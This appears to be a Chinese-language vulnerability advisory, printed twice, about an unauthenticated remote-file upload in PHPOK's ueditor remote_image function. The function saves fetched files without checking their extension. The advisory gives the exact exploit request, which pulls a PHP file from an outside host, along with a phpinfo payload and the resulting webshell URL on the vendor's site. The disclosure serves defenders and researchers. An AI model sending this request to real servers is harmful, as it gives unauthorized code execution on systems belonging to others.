VULHUB ™

### 简要描述： 无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。 不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题 ### 详细说明： /framework/www/ueditor_control.php行61 remote_image_f函数没对远程文件后缀做检查直接保存到本地 这个真心没什么好分析的我就不贴代码分析了 ### 漏洞证明： 构造请求 ``` /index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php ``` 我这里1.txt的内容是 ``` <?php phpinfo();?> ``` 测试问题嘛 不做破坏 [<img src="https://images.seebug.org/upload/201406/0116020686c16e632111045598208f643379cf17.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/0116020686c16e632111045598208f643379cf17.jpg) shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。 http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php [<img src="https://images.seebug.org/upload/201406/01160315043f5872a131fa848c769c26ad486869.jpg" alt="x2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/01160315043f5872a131fa848c769c26ad486869.jpg)

### 简要描述： 无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。 不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题 ### 详细说明： /framework/www/ueditor_control.php行61 remote_image_f函数没对远程文件后缀做检查直接保存到本地 这个真心没什么好分析的我就不贴代码分析了 ### 漏洞证明： 构造请求 ``` /index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php ``` 我这里1.txt的内容是 ``` <?php phpinfo();?> ``` 测试问题嘛 不做破坏 [<img src="https://images.seebug.org/upload/201406/0116020686c16e632111045598208f643379cf17.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/0116020686c16e632111045598208f643379cf17.jpg) shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。 http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php [<img src="https://images.seebug.org/upload/201406/01160315043f5872a131fa848c769c26ad486869.jpg" alt="x2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/01160315043f5872a131fa848c769c26ad486869.jpg)